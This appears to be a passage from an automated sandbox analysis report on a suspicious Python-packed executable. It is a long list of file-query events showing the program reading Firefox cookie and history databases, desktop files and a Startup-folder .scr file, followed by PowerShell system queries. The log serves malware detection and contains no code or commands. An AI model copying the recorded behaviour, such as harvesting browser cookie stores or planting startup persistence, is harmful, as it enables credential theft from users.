                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\permissions.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\protections.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\ls-archive.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
